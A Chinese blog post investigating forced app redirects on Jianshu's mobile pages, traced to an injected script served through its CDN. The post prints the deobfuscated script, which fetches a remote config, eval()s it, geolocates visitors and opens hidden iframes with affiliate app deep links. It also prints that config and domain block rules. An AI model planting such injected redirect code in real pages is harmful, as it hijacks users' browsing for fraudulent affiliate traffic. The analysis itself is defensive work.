背景

每次手机上搜资料时,只要进入了简书,那么必定会跳转到各种app(淘宝、京东、天猫、京东金融等等),很烦的啊。
2020-02-02 更新:
在csdn、豆瓣上也发现这个问题。

我还以为是我本地宽带或者dns劫持,但是我本地dns用的是114和119,很少出现这种问题,而且简书也是https,浏览器也是绿标,
所以就usb chrome 远程调试看了下,不看不知道,居然会唤醒这么多app和跳转网页。

临时解决方案

屏蔽  ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),host改也行。

方法一: 手机端使用 火狐浏览器,安装 AdGuard 广告过滤插件,屏蔽 ad.lflucky.com  

方法二、有位读者推荐的软件也很不错,AdGuard Home ,安装在软路由中使用~

2020-03-09:

广告代码改为https://jian.t58b.com/js/jan/jian.js所以,继续屏蔽 jian.t58b.com

  最后想了下,既然是cdn劫持,那么我把cdn域名一刀切怎么样,别说,效果还蛮不错的,界面干净了。 屏蔽整个cdn下的js,不过这样带来的后果是文章不能动态加载出来,只适合偶尔使用简书。

1

cdn2.jianshu.io/*.js

手机端用yandex浏览器,装广告屏蔽插件,屏蔽  ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),我个人装的是广告终结者,本来想装uBlock的,懒得折腾就没装。或者路由器ad插件屏蔽这个域名。添加屏蔽域名后完美,终于不再跳转。

分析

因为我的前端是废的,所以也只能进行简单点的分析,大佬们看看就好了。 简单分析了一下跳转js,点击 VM2486:1 进入到js,格式化后的代码如下

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132

(function() {
	function getJson(a, b) {
		var c = new XMLHttpRequest();
		c.open("get", a);
		c.send(null);
		c.onreadystatechange = function() {
			if (c.readyState == 4 && c.status == 200) {
				b && b(eval("(" + c.responseText + ")"))
			}
		}
	}
	function ProductLink(a) {
		this.product = a.productJson;
		this.disabledArea = ["UNITED STATES", "JAPAN", "SINGAPORE", "CANADA", "香港", "北京", "上海"];
		this.avokeTime = a.avokeTime
	}
	ProductLink.prototype.init = function() {
		var b = this;
		if (window.navigator.platform.indexOf("Win") > -1 || window.navigator.platform.indexOf("Mac") > -1) {} else {
			this.isDisabled(function() {
				var a = true;
				try {
					for (var i = 0; i < b.disabledArea.length; i++) {
						if (returnCitySN["cname"].indexOf(b.disabledArea[i]) > -1) {
							a = false;
							break
						}
					}
				} catch(e) {}
				if (!a) {
					return
				}
				b.addElement()
			})
		}
	};
	ProductLink.prototype.isDisabled = function(a) {
		var b = document.createElement("script");
		var c = false;
		document.body.appendChild(b);
		b.src = "https://pv.sohu.com/cityjson";
		b.onload = function() {
			if (!c) {
				c = true;
				a && a()
			}
		};
		setTimeout(function() {
			if (!c) {
				c = true;
				a && a()
			}
		},
		4000)
	};
	ProductLink.prototype.addElement = function() {
		var a = this;
		setTimeout(function() {
			a.showMainProject();
			a.showSecondaryProduct()
		},
		2000)
	};
	ProductLink.prototype.showMainProject = function() {
		this.showAllKind(this.product.mainProduct.appLink, this.product.mainProduct.cancelTime)
	};
	ProductLink.prototype.showSecondaryProduct = function() {
		var b = this;
		var c = this.product.secondaryProduct.concat();
		var d = c.length;
		var e = null;
		e = setInterval(function() {
			if (d <= 0) {
				clearInterval(e);
				return
			}
			var a = Math.floor(Math.random() * d);
			b.showAllKind(c[a].appLink, c[a].cancelTime);
			c.splice(a, 1);
			d--
		},
		b.avokeTime * 1000)
	};
	ProductLink.prototype.showAllKind = function(a, b) {
		var c = a.concat();
		var d = c.length;
		var e = false;
		var f = this.getCurrentDate();
		while (d > 0 && !e) {
			var g = Math.floor(Math.random() * d);
			if (c[g].type == "random") {
				this.newIframe(c[g].link, b);
				e = true
			} else if (c[g].type == "date") {
				if (c[g][f]) {
					this.newIframe(c[g][f], b);
					e = true
				} else {
					c.splice(g, 1);
					d--
				}
			}
		}
	};
	ProductLink.prototype.getCurrentDate = function() {
		var a = new Date(),
		Y = a.getFullYear() + "-",
		M = (a.getMonth() + 1 < 10 ? "0" + (a.getMonth() + 1) : a.getMonth() + 1) + "-",
		D = a.getDate() < 10 ? "0" + a.getDate() : a.getDate();
		return Y + M + D
	};
	ProductLink.prototype.newIframe = function(b, c) {
		var d = document.createElement("iframe");
		d.style.display = "none";
		d.src = b;
		document.body.appendChild(d);
		var e = document.createElement("iframe");
		e.style.display = "none";
		e.src = "./counturl.html?url=" + encodeURIComponent(b);
		document.body.appendChild(e);
		setTimeout((function(m, a) {
			return function() {
				document.body.removeChild(m);
				document.body.removeChild(a)
			}
		})(d, e), c * 1000)
	};
	getJson("./json/product.json",
	function(a) {
		new ProductLink(a).init()
	})
})();

嗯,上面有个getJson方法,搜索了下加载记录发现域名是:

1

https://ad.lflucky.com/janes/json/product.json(对应ip为:59.110.185.253)

阿里云的机器,很不错,考虑到个各种不同的宽带用户给予最佳的劫持体验

。 Json内容如下(时间 2019-08-31 15:52 ):

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137

{
    "productJson": {
        "mainProduct": {
            "appName": "tb",
            "appLink": [
                {
                    "type": "random",
                    "link": "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768&materialid=10016&h5Url=https://h5.m.taobao.com/bcec/dahanghai-jump.html?spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768"
                }
            ],
            "cancelTime": 5
        },
        "secondaryProduct": [
            {
                "appName": "uc",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=17707084109410804287&type=multiple&from=6001",
                        "2019-08-31": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-01": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-02": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-03": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-04": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-05": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001",
                        "2019-09-06": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "sjbd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "baiduboxapp://v1/easybrowse/open?url=https://dwz.cn/1VJnrokX?u=68a5251f61c446dd&needlog=1&logargs={"source":"1023217w","from":"openbox","page":"other","type":"","value":"url","channel":""}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "yk",
                "appLink": [
                    {
                        "type": "random",
                        "link": "youku://weex?source=00002184&url=https://t.youku.com/yep/page/m/sanfang1903_wmdt?wh_weex=true&isNeedBaseImage=1&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "wph",
                "appLink": [
                    {
                        "type": "random",
                        "link": "vipshop://goHome?tra_from=tra:C01V4m1bc22uzug2::mig_code::ac010m4olsydie4ern10dr6k8vkne6bd"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jdjr",
                "appLink": [
                    {
                        "type": "random",
                        "link": "jdmobile://share?jumpType=8&jumpUrl=https://u.jd.com/Yxw5iX?channellv=hqtf1&channel=default&sourceUrl=1108*gt001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "pdd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "pinduoduo://com.xunmeng.pinduoduo/duo_coupon_landing.html?goods_id=2338511&pid=8827514_107105089&cpsSign=CC_190820_8827514_107105089_49f497cee8712faf331724b17240bda9&duoduo_type=2"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "zfb",
                "appLink": [
                    {
                        "type": "random",
                        "link": "alipays://platformapi/startapp?appClearTop=false&appId=20000067&startMultApp=YES&url=https://render.alipay.com/p/f/fd-jr8wq5v4/pages/inside/index.html?pid=2088231933430185&partnerid=fl01&__webview_options__=pd%3DNO%26ttb%3Dauto&enableWK=YES"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "openapp.jdmobile://virtual?params={\"category\":\"jump\",\"sourceType\":\"sourceType_test\",\"des\":\"m\",\"url\":\"https://u.jd.com/dRrNLl\",\"unionSource\":\"Awake\",\"channel\":\"cedad4c0ad02455c9a818f1b3d98da1a\",\"union_open\":\"union_cps\"}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jrtt",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk143://search?keyword=信息学奥赛取消+有学生集训数月&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-08-31": "snssdk143://search?keyword=在家乡一口气买十套房?柳岩回应&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-01": "snssdk143://search?keyword=国内首例克隆猫主人:花了25万&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-02": "snssdk143://search?keyword=迪士尼不接受调解+坚持翻包检查&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-03": "snssdk143://search?keyword=宠物医疗市场扩张+执业医师稀缺&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-04": "snssdk143://search?keyword=游客坐路中央拍照交警提醒&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-05": "snssdk143://search?keyword=天降垃圾砸车可起诉全楼&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-06": "snssdk143://search?keyword=健身房承诺开泳池未兑现被投诉&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "douyin",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk1128://detail?id=6727796549604150532&gd_label=click_schema_lx5",
                        "2019-08-31": "snssdk1128://detail?id=6727793959982157063&gd_label=click_schema_lx5",
                        "2019-09-01": "snssdk1128://detail?id=6728772476395949320&gd_label=click_schema_lx5",
                        "2019-09-02": "snssdk1128://detail?id=6728647813158145291&gd_label=click_schema_lx5",
                        "2019-09-03": "snssdk1128://detail?id=6729018672242871556&gd_label=click_schema_lx5",
                        "2019-09-04": "snssdk1128://detail?id=6729044398245498124&gd_label=click_schema_lx5",
                        "2019-09-05": "snssdk1128://detail?id=6728696625901980931&gd_label=click_schema_lx5"
                    }
                ],
                "cancelTime": 5
            }
        ]
    },
    "avokeTime": 2
}

在 productJson.secondaryProduct 看出,总共会跳转以下几个app

  1. UC
  2. sjbk(不知道是啥)
  3. yk(优酷)
  4. wph(不知道是啥)
  5. jdjr(京东金融)
  6. pdd(拼多多)
  7. zfb(支付宝)
  8. jd(京东)
  9. jrtt(不知道是啥)
  10. douyin(抖音)

可以看出来是真的恶心,最恶心的是跳转到这些页面

1
2

https://mip.yemnn.cn/llq_5/p7069z.html
https://m.685862.vip/2019llq_5/p7069z.html?20190901001245&t=1786766884&f=1&i=1

导致不能后退、强制下载app,而且又得看历史记录才能到原来浏览的地方。这个部分没有重现出来,后面补上。

  然后继续往上走,发现这个域名第一次出现的地方是

1

https://cdn2.jianshu.io/asimov/2.0a635c573bb72b959d07.js,简书的cdn

同时访问搜狐的接口进行ip地域解析,根据用户所在地区进行不同的广告或者跳转app。 剩下的不用分析也知道了,只有几种可能

  1. 简书 官方自己搞得跳转代码
  2. 简书用的cdn服务商进行的劫持
  3. 运营商结合cdn服务商一起劫持

此时我这里 cdn2.jianshu.io 解析的ip为:163.177.20.232 而在ipip和17ce发现,解析到这个ip的地区是广州联通、加上我的地区,会发生劫持。  

   

Yandex浏览器添加ad插件进行屏蔽

跳转到页面,待复现分析……

更新

由于我开启了ipv6,默认解析dns变成了运营商的ipv6,导致返回的ip和公共dns不一样,运营商+cdn运营商劫持?openwrt居然不能指定ipv6的dns,dncp给客户端的v6居然是运营商的而电脑手机会按照v6的dns进行解析,不按照设置的v4 dns解析。

根据ipip显示信息来看,是一家 天际友盟  广告联盟,而我好奇的是,这家公司是怎么拿到简书的ssl证书的? 手机浏览器还显示绿标  

 

更新

在禁用ipv6后,我本地使用114和119解析还是被劫持的ip